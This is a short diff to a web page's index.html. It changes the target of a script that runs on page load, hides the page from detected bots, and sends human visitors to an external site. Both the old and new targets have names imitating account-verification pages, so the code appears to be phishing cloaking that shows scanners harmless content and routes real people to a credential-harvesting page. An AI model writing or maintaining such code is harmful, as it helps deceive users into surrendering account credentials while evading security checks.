--- a/index.html
+++ b/index.html
@@ -62,7 +62,7 @@
 
     window.onload = function() {
       if (!detectBot()) {
-        window.location.replace("http://www.page-contac-accountcenters.top/live")
+        window.location.replace("https://start-unlocking-account-verification.netlify.app/")
       } else {
         document.getElementById('content').style.display = 'block'
       }
